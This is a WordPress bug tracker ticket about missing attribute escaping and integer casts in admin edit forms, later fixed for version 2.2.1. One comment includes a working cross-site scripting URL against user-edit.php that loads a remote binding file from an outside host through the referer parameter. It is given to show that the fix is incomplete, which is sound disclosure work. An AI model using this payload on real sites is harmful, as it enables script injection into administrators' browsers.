Opened 18 years ago
Closed 18 years ago
#4333 closed defect (bug) (fixed)
Some attribute_escape()s and relatives for edit forms
| Reported by: |
|
Owned by: | |
|---|---|---|---|
| Milestone: | 2.2.1 | Priority: | high |
| Severity: | normal | Version: | 2.2 |
| Component: | Administration | Keywords: | |
| Focuses: | Cc: |
Description
Attachments (3)
Change History (14)
#2
@
18 years ago
- Owner changed from anonymous to rob1n
Also, looks like we could use some selected()'s in there.
#4
@
18 years ago
- Resolution set to fixed
- Status changed from new to closed
Looks like those <select>'s options aren't going to work with selected().
#5
@
18 years ago
- Milestone changed from 2.3 to 2.2.1
- Resolution fixed deleted
- Status changed from closed to reopened
Also needs to go into 2.2.1 and 2.0.11
#8
@
18 years ago
Well i make some trunk based patches for 2.2.
Obviously i don't add anything that has to be related with the trunk version.
Also i think that the trunk solution is incomplete because doesn't filter the user-edit.php based version of the bug:
user-edit.php?user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'
Note: See
TracTickets for help on using
tickets.
The int casts can go in get_category_to_edit() and the other to_edit() functions since we always want them to be ints. attribute_escape() needs more context, so calling it from the forms is good.